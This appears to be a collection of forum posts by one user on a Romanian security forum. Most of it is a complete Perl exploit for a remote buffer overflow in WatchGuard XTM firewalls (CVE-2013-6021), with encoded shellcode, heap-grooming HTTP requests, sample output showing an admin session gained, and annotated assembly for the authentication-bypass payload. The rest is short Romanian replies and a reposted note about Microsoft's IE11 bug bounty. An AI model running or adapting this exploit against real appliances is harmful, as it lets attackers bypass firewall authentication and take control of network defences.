Gonzalez

#!/usr/bin/perl -w # Exploit Title: WatchGuard Firewall XTM version 11.7.4u1 - Remote buffer overflow exploit ~ sessionid cookie # Date: Oct 18 2013 # Exploit Author: st3n@funoverip.net (a.k.a. jerome.nokin@gmail.com) # Vendor Homepage: http://www.watchguard.com # Version: <= 11.7.4u1 # Tested on: XTMv # CVE : CVE-2013-6021 =header ********************************************************************* ** WatchGuard Firewall XTM version 11.7.4u1 ** ** Remote buffer overflow exploit ~ sessionid cookie ** ********************************************************************* ** ** ** Author: jerome.nokin@gmail.com ** ** Blog: http://funoverip.net ** ** CVE: CVE-2013-6021 ** ** ** ********************************************************************* ** ** ** - Bug, exploit & shellcode details available on: ** ** http://funoverip.net/?p=1519 ** ** ** ** - Decoded shellocde can be found at the end of this file ** ** ** ********************************************************************* =cut =output sample [*] Sending HTTP ping request to https://192.168.60.200:8080 : OK. Got 'pong' [*] Checking sessionid cookie for bad chars [*] Checking shellcode for bad chars [*] Heap messaging (request 1) : ... [*] Sending authentication bypass shellcode (request 2) [*] HTTP Response : -------------------------------------------------------------------------------- HTTP/1.1 200 OK Content-type: text/xml Set-Cookie: sessionid=6B8B4567327B23C6643C98696633487300000014 Date: Sun, 27 Oct 2013 21:11:38 GMT Server: none Content-Length: 751 <?xml version="1.0"?> <methodResponse> <params> <param> <value> <struct> <member><name>sid</name><value>6B8B4567327B23C6643C98696633487300000014</value></member> <member><name>response</name><value></value></member> <member> <name>readwrite</name> <value><struct> <member><name>privilege</name><value>2</value></member> <member><name>peer_sid</name><value>0</value></member> <member><name>peer_name</name><value>error</value></member> <member><name>peer_ip</name><value>0.0.0.0</value></member> </struct></value> </member> </struct> </value> </param> </params> </methodResponse> -------------------------------------------------------------------------------- [*] Over. =cut use warnings; use strict; use IO::Socket::SSL; # host and port of the XTM web console my $host = "192.168.60.200"; my $port = "8080"; # Shellcode (watch out bad chars) my $shellcode = # shellcode: bypass password verification and return a session cookie "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQ" . "KusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUX" . "eXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO" . "9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNu" . "RLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlK" . "sevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oy" . "ctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lK" . "benpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6" . "LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A"; # Shellocde max length my $shellcode_max_len = 2000; # set our shellcode address into EAX (expected by alpha2 encoder) my $alpha2_ecx24 = "\x8b\x41\x24" . # mov eax, [ecx+0x24] "\x29\xd0" . # sub eax, edx ; (edx is updated by nopsled) "\x83\xc0\x40" . # add eax, 0x40 "\x83\xe8\x35"; # sub eax, 0x35 # for the reader, "add eax, edx" contains bad chars. # This is the reason why the nopsled decrement EDX and that we use "dec eax, edx" # flush after every write $| = 1; # HTTP POST data for authentication request my $login_post_data = "<methodCall><methodName>login</methodName><params><param><value><struct><member>" . "<name>password</name><value><string>foo</string></value></member><member>" . "<name>user</name><value><string>admin</string></value></member></struct></value>" . "</param></params></methodCall>"; # list of bad characters my @badchars = ( "\x00", "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x0a", "\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13", "\x14", "\x15", "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c", "\x1d", "\x1e", "\x1f", "\x20", "\x22", "\x26", "\x27", "\x3b" # cookie delimiters ); # function: Check input for badchars. sub check_badchars { my $in = shift; my $stop = 0; for(my $i=0; $i<length($in); $i++){ my $c = substr($in,$i,1); if($c ~~ @badchars){ printf " - bad char '0x%02x' found\n", ord($c); $stop = 1; } } if($stop){ exit; } } # function: testing remote connectivity with the appliance # send HTTP "ping" request and expect "pong" reply sub testing_connectivity { print "[*] Sending HTTP ping request to https://$host:$port : "; my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!"; if($sock){ my $req = "GET /ping HTTP/1.0\r\n" . "Host:$host:$port" . "\r\n" . "\r\n"; # send ping print $sock $req; my $resp=''; my $pong = 0; # read answer while (my $line = <$sock>){ if($line =~ /pong/) { $pong = 1;} $resp .= $line; } # got pong ? if($pong){ print "OK. Got 'pong'\n"; }else{ print "ERROR. Expecting 'pong' response but received :\n"; print $resp; exit; } close $sock; }else{ print "ERROR: Socket failed !\n"; exit; } } # function: HTTP request used for HEAP messaging phase sub building_request_step1 { my $sessionid = "A" x 120; # do not overflow now my $req = "POST /agent/ping HTTP/1.1\r\n" . "Host:$host:$port" . "\r\n" . "User-Agent: " . "a" x 100 . "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 " . "a" x 100 . "\r\n" . "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, " . "a" x 992 . "\r\n" . "Accept-Language: en-gb,en;q=0.5" . "a" x 200 . "\r\n" . "Cookie: sessionid=" . $sessionid . "\r\n" . "Accept-Charset: utf-8\r\n" . "Content-Type: application/xml\r\n" . "Content-Length: 3\r\n" . "\r\n" . "foo" ; return $req; } # function: HTTP request used for buffer overflow exploitation sub building_request_step2 { my $sessionid = "A" x 140 . # junk "\x44\x85" ; # off by 2 overflow to reach 0x8068544 (on the heap). # 0x8068544 contains a "good memory chunk" which satisfy all rules print "[*] Checking sessionid cookie for bad chars\n"; check_badchars($sessionid); my $req = "POST /agent/ping HTTP/1.1\r\n" . "Host:$host:$port" . "\r\n" . "User-Agent: " . "a" x 1879 . "\r\n" . "Connection: keep-alive" . "a" x 22 . "\x4a" x ($shellcode_max_len - length($shellcode) - length($alpha2_ecx24)) . # nops $alpha2_ecx24 . # set EAX to shellcode addr $shellcode . # shellcode "\r\n" . "Accept-Encoding: identity," . "b" x 1386 . "\r\n" . "Cookie: sessionid=" . $sessionid . "\r\n" . "Accept-Charset: utf-8\r\n" . "Content-Type: application/xml\r\n" . "Content-Length: " . length($login_post_data). "\r\n" . "\r\n" . $login_post_data ; return $req; } # function: Send an HTTP request. sub send_http_request { my $req = shift; my $read_answer = shift || 0; my $http_resp=''; # Open socket my $sock = IO::Socket::SSL->new( PeerHost => "$host", PeerPort => "$port") or die "SSL: $!"; if($sock){ print $sock $req; # do we need the answer ? if ($read_answer){ my $is_chunked = 0; my $is_body = 0; while(my $line = <$sock>){ if($line =~ /Transfer-Encoding: chunked/){ $is_chunked = 1; next; } if($line eq "\r\n"){ # we reached the body if($is_chunked){ $line = <$sock>; # chunk length $line =~ s/\r\n//g; $sock->read(my $data, hex($line)); # read chunk $http_resp .= sprintf "Content-Length: %d\r\n\r\n", hex($line); $http_resp .= $data; close $sock ; return $http_resp; } } $http_resp .= $line; } } close $sock; }else{ print "ERROR: Socket failed !\n"; exit; } return $http_resp; } ### MAIN #### # print banner print << 'EOF'; ********************************************************** ** WatchGuard Firewall XTM version 11.7.4u1 ** ** Remote buffer overflow exploit ~ sessionid cookie ** ********************************************************** ** ** ** Author: jerome.nokin@gmail.com ** ** Blog: http://funoverip.net ** ** CVE: CVE-2013-6021 ** ** ** ********************************************************** ** ** ** Bug, exploit & shellcode details available on: ** ** http://funoverip.net/?p=1519 ** ** ** ********************************************************** EOF # Send an HTTP ping request testing_connectivity(); # building HTTP requests my $request_step1 = building_request_step1(); my $request_step2 = building_request_step2(); # Testing shellcode against bad cahrs print "[*] Checking shellcode for bad chars\n"; check_badchars($shellcode); # Fillin the heap print "[*] Heap messaging (request 1) : "; for(my $i=0 ; $i<3 ; $i++){ send_http_request($request_step1); print "."; } print "\n"; # Exploiting print "[*] Sending authentication bypass shellcode (request 2)\n"; my $resp = send_http_request($request_step2,1); print "[*] HTTP Response : \n\n"; print "-" x 80 . "\n"; print $resp; print "-" x 80 . "\n\n"; print "[*] Over.\n"; exit; =shellcode ;------------------------------------------------ ; shellcode-get-gession.asm ; by Jerome Nokin for XTM(v) 11.7.4 update 1 ;------------------------------------------------ global _start _start: ; current EBP/ESP values ;------- ; esp 0x3ff0b518 ; ebp 0x3ff0b558 ; first, fix the stack in HTTP_handle_request function ; ------- ; esp 0x3ff0b6f0 ; ebp 0x3ffffcb8 ; we'll do ;--------- ;$ perl -e 'printf "%x\n", 0x3ff0b518 + 472' ; 3ff0b6f0 ; ESP = ESP + 472 ;$ perl -e 'printf "%x\n", 0x3ff0b558 + 1001312' ; 3ffffcb8 ; EBP = EBP + 1001312 ; fix ESP/EBP add esp, 472 add ebp, 1001312 ; fixing overwritten ptrs ; finding initial malloc pointer v50 (overwritten) ; 0805f000-08081000 rwxp 00000000 00:00 0 [heap] ; v54 and v55 have not been overwritten and contain *(v50+0x10) and *(v50+0x14) ; example inside gdb ;b *0x8051901 ;b *0x80519c0 ;(gdb) x/xw $ebp-0xf8 <===== v55 ;0x3ffffbc0: 0x08065b90 ;(gdb) x/xw $ebp-0xfc <===== v54 ;0x3ffffbbc: 0x08067fe0 ;(gdb) find /w 0x08060000, 0x0806ffff, 0x08067fe0, 0x08065b90 <==== search seq on heap ;0x8063b48 ;1 pattern found. ;(gdb) x/xw 0x8063b48-0x10 <==== initial malloc ptr (v50) is at 0x8063b48-0x10 ;0x8063b38: 0x00000001 ; search this sequence on the heap mov eax, [ebp-0xfc] ; v54 mov ebx, [ebp-0xf8] ; v55 mov edi, 0x0805f000 ; heap start addr loop: add edi, 4 lea esi, [edi+4] cmp esi, 0x08081000 ; edi is out of the heap ? je loop_end cmp [edi], eax ; cmp v54 jne loop cmp [edi+4], ebx ; cmp v55 je found jmp loop loop_end: mov eax, 0x08063b38 ; default value (should not be reached) found: lea eax, [edi-0x10] ; eax = v50 address (malloc ptr addr) ; EBP-0x10c ; saved content of v50 (malloc) = ebp-0x10c mov [ebp-0x10c], eax ; reset EBX (see following) ; 805185c: e8 95 43 00 00 call 8055bf6 <wga_signal+0x784> ; 8051861: 81 c3 93 c7 00 00 add ebx,0xc793 ; .... ; 8055bf6: 8b 1c 24 mov ebx,DWORD PTR [esp] ; 8055bf9: c3 ret mov ebx, 0x805dff4 ; EBP-0x108 ; just reset it to 0 mov dword [ebp-0x108], 0x0 ; EBP-0x100 ; 80519b1: 8b 40 0c mov eax,DWORD PTR [eax+0xc] ; 80519b4: 89 85 00 ff ff ff mov DWORD PTR [ebp-0x100],eax mov eax, [eax+0xc] mov [ebp-0x100], eax ; simulate call to login function. copy args mov ecx, [ebp-0x10c] mov eax, [ebp-0x198] mov edx, [ebp-0x194] mov [esp+0x4],eax mov [esp+0x8],edx mov [esp],ecx ; Now setup the login function stack ; current esp/ebp ; ---------------- ; esp 0x3ff0b6f0 ; ebp 0x3ffffcb8 ; we want to land into the login function ; --------------------------------------- ; esp 0x3ff0b420 ; ebp 0x3ff0b6e8 ; we'll do ;--------- ; $ perl -e ' printf "%x\n", 0x3ff0b6f0 - 720' ; 3ff0b420 ; ESP = ESP - 720 ; $ perl -e ' printf "%x\n", 0x3ffffcb8 - 1000912' ; 3ff0b6e8 ; EBP = EBP - 1000912 ; stack fix sub esp, 720 sub ebp, 1000912 ; EBX -> .GOT (same as above btw) mov ebx, 0x805dff4 ; simulate "decode HTTP content" fct, at top of the login function mov edx, [ebp+0x8] mov edx, [edx+0x8] mov dword [esp+0x4], 0x0 ; no content_encoding header mov [esp], edx mov esi, 0x0804d990 call esi ; decode content mov [ebp-0x70],eax ; int decoded_content; // [sp+258h] [bp-70h]@1 ; simulate "search remote_address" mov eax, [ebp+0x8] mov eax, [eax+0x14] mov [esp+0x4],eax lea eax,[ebx-0x3ceb] mov [esp],eax mov esi, 0x804b670 ;FCGX_GetParam call esi add eax, 0x7 ; remove '::ffff:' ====> to improve mov [ebp-0x60], eax ; is_admin = 4 mov dword [ebp-0x48], 0x4 ; simulate "search req_user value" mov eax, [ebp-0x70] mov eax, [eax+0x50] mov dword [esp+0x8],0x0 lea edx,[ebx-0x3c93] mov [esp+0x4],edx mov [esp],eax mov esi, 0x804c07e call esi ; <FCGX_PutStr@plt+0x3de> mov [ebp-0x68],eax ; v49 = 2 (ipv4) mov word [ebp-0x5a], 0x2 ; unsigned __int16 v49; // [sp+26Eh] [bp-5Ah]@1 ; challenge mov dword [ebp-0x6c], 0x0 ; const char *req_challenge; // [sp+25Ch] [bp-6Ch]@1 ; set v43 to null mov dword [ebp-0x74], 0x0 ;int v43; // [sp+254h] [bp-74h]@1 ; ok, we are ready to jump in the middle of the "login" function ; right after the password verification ; jump here ; 804ee4b: c7 44 24 04 00 12 00 mov DWORD PTR [esp+0x4],0x1200 ; 804ee52: 00 ; 804ee53: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1 ; 804ee5a: e8 11 c4 ff ff call 804b270 <calloc@plt> mov edi, 0x804ee4b jmp edi =cut -Gonzalez

Cacati = NSA -Gonzalez

Mass-media manipuleaza lumea. La fel face si biserica. -Gonzalez

Fara link de refer nu ai putut nu? -Gonzalez

Welcome to RST. -Gonzalez

(Credit: Microsoft) Microsoft recently launched a bounty-hunting program for researchers to find bugs, security flaws, and vulnerabilities in the preview version of Internet Explorer 11. And, now, a handful of hunters have come to claim their prize. A total of six researchers have found 15 vulnerabilities within the preview version of Internet Explorer 11. And, Microsoft has paid them more than $28,000 to date. Microsoft announced its month-long bug bounty program for IE 11 in June. The company's goal is to stamp out security vulnerabilities in its software as early on as possible. Microsoft offered researchers up to $11,000 per critical exploit found. IE 11 is an integral part of Windows 8.1 while at the same time it will most likely be a target for hackers and malware writers. For Microsoft, getting the security vulnerabilities squashed earlier rather than later is its primary motivation. IE 11 for Windows 8 is scheduled to ship with Windows 8.1 on October 18. (Via Neowin)

Bun venit pe RST. Ai greseli gramaticale pe site, ar fi bine sa le corectezi. -Gonzalez

Welcome to RST. -Gonzalez

Foarte bun, mersi. -Gonzalez

Mersi pentru lista. -Gonzalez

Si eu sunt in domeniul hostingului, de ceva timp e gata si siteul, doar am de facut cateva modificari la el. Ma voi axa doar pe clienti romani. Peste ceva timp merg sa-mi fac PFA, e cea mai buna metoda. Nu platesti la stat doar daca ai profit. Si nu voi avea decat 1 angajat. Problema e ca trebuie sa ai o diploma pentru a demonstra ca poti lucra in domeniu. Asta nu stiu cum voi face, dar va trebui sa gasesc o metoda. -Gonzalez

Firefox rule them all. -Gonzalez

Nu cred ca e asa de sigur Tor acum, cum a fost mai demult. -Gonzalez

Foarte bun Nytro. Felicitari! -Gonzalez

Va las pe voi sa folositi Google. -Gonzalez

Incearca pe alt forum roman. Sau poate fi si un forum englez. -Gonzalez

Daca e cineva care merge la DefCamp si e din Tg-Mures, as dori sa mergem impreuna. Trimite-ti un mesaj privat sau lasa-ti un reply aici. -Gonzalez

Bun venit sadik! -Gonzalez

Sita Gabriel - Rom?nia | LinkedIn -Gonzalez

Trebuia sa ma loghez sa dau like. Mersi man! -Gonzalez

Foarte bun! Mersi. -Gonzalez

Stratovarius - Black Diamond.mp3 -Gonzalez

Bun venit! -Gonzalez

Iti sugerez sa alegi o alta tema pentru blog, sa fie de tip blog, dar sa nu aiba chiar in mijloc sidebar (cum e tema aceasta pe care o ai). Un alt logo care sa arate mai bine, fa-l sa fie asemanator cu culoarea temei pe care o are blogul. Incearca sa iti construiesti o lista de emailuri (list building), vei putea face mai multi bani cu ea daca oamenii dau subscribe. Ofera-le informatii utile, un video course, cele mai recente posturi, pluginuri, stiri despre siteurile mari de afiliere si asa mai departe. Nu ai nevoie "META", doar de un opt-in form, poti sa-ti faci cont la MailChimp.com (pana la 2000 de subscriberi e gratis, pe urma poti sa faci upgrade), Social Media Profiles, Recent/Top Posts, poate un video of the week. Posturile incearca sa le structurezi cu H1, H2 ca sa fie usor de citit. Scrie pentru oameni nu pentru motoarele de cautare. Mult succes! -Gonzalez

Foarte bun postul Nytro, sper ca va fi de folos pentru multi. -Gonzalez